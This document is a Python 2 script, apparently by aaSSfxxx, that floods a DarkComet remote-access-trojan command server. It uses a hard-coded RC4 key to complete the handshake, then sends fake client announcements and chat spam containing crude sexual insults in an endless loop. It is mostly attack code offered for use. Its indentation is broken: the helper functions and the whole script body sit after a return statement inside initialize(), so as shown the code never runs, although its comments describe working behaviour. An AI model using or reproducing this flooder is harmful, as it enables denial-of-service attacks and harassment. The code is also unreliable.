DarkComet Flooder

#!/usr/bin/python
#-*- coding: utf-8 -*-

#DarkComet flooder
#by aaSSfxxx :þ

# Generates a lot of fake connections to a DarkComet C&C and floods its chat zone.
# The key has to be changed if DarkComet <= 5.1 is used or if the server has a password,
# which can be easily found with a little bit of reverse-engineering.

import socket
from time import *
import sys

####################### RC4 functions ################################

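def initialize(key):
    """Run the RC4 key-scheduling step and return the 256-entry state list.

    `key` is a non-empty sequence of integers. Each value is folded in
    modulo 256, so values above 255 are reduced rather than rejected.

    RC4 is a legacy cipher with known weaknesses; it is implemented here
    only because the protocol this script speaks is built on it.

    Raises ValueError if `key` is empty.
    """
    if len(key) == 0:
        raise ValueError("RC4 key must not be empty")
    # list() gives a mutable state on interpreters where range() is lazy.
    k = list(range(256))
    j = 0
    for i in range(256):
        j = (j + k[i] + key[i % len(key)]) % 256
        k[i], k[j] = k[j], k[i]
    # Return only after all 256 swaps; returning from inside the loop would
    # hand back a state mixed with just the first key byte.
    return k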
    
    def gen_random_bytes(k):
        """Yield the RC4 keystream, one integer per step, from state list `k`.

        `k` is swapped in place on every step, so a state that has been
        consumed here no longer matches the output of the key schedule.
        The generator never terminates; the caller decides how much to take.
        """
        pos = 0
        acc = 0
        while True:
            pos = (pos + 1) % 256
            acc = (acc + k[pos]) % 256
            # Swap the two selected entries before reading the output index.
            k[pos], k[acc] = k[acc], k[pos]
            out_index = (k[pos] + k[acc]) % 256
            yield k[out_index]
            
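    def run_rc4(k, text):
        """XOR each character of `text` with the RC4 keystream from state `k`.

        `k` is the 256-entry state list produced by the key schedule; it is
        mutated while the keystream is drawn, so pass a freshly initialised
        state for every call. `text` is a string whose characters are
        converted with ord(). The same call both encrypts and decrypts.

        Returns the transformed characters joined into one string.
        """
        keystream = gen_random_bytes(k)
        # The next() builtin works on Python 2.6+ and Python 3, whereas the
        # generator's .next() method exists only on Python 2.
        return ''.join(chr(ord(char) ^ next(keystream)) for char in text)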
    
######################## The exploit #############################
    
    # Script body: reads the server address and port from argv, performs the
    # hex-encoded RC4 handshake, then repeats two messages until the process
    # is stopped. Python 2 syntax throughout (print statement, the "hex" codec).
    if (len(sys.argv) != 3):
        print "Usage: " + sys.argv[0] + " <ip_of_server> <port>"
    else:
        # Static key hard-coded in the script. Per the header comment it
        # differs for DarkComet <= 5.1 or when the server has a password.
        key = "#KCMDDC51#-890"
        k = [ord(char) for char in key]
        
        # Plain TCP connection; no timeout is set, so connect/recv can block.
        s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        s.connect((sys.argv[1], int(sys.argv[2])))
        
        # First message from the server (IDTYPE), hex-decoded then RC4-decrypted.
        # A single recv(1024) assumes the whole greeting arrives in one read.
        # Every message in this script gets a fresh initialize(k), so the
        # keystream restarts each time: identical plaintext produces identical
        # hex on the wire, which makes this traffic matchable by a fixed
        # network signature.
        data = s.recv(1024)
        print run_rc4(initialize(k), data.decode("hex"))
        
        # Reply "SERVER", RC4-encrypted and sent as upper-case hex.
        s.send(run_rc4(initialize(k), "SERVER").encode("hex").upper())
        # The server's answer is read and then never used.
        wtf = s.recv(1024)  
  
        print "Sending request. DON'T close the window"
        # No exit condition and the socket is never closed; the loop ends only
        # when the process is killed or send() raises.
        while True:
            # Pipe-separated record announcing a client to the server.
            # NOTE(review): field meanings are not shown in this file - confirm
            # against protocol documentation before relying on them.
            to_send = "infoesGuest16|127.0.0.1 / [66.66.66.66]:1604|SUCEMWA / THEGAME|6256546|4294833s|Salut, tu suces ?|x||5.2.0"
            s.send(run_rc4(initialize(k), to_send).encode("hex").upper())
            # CHATOUT-prefixed message; presumably shown in the operator's chat
            # window (the header comment calls it the "chat zone").
            bullshit = "CHATOUTsalut, tu suces ?"
            s.send(run_rc4(initialize(k), bullshit).encode("hex").upper())
            # 0.1 s pause: about ten iterations per second on this one socket.
            sleep(0.1)

aaSSfxxx

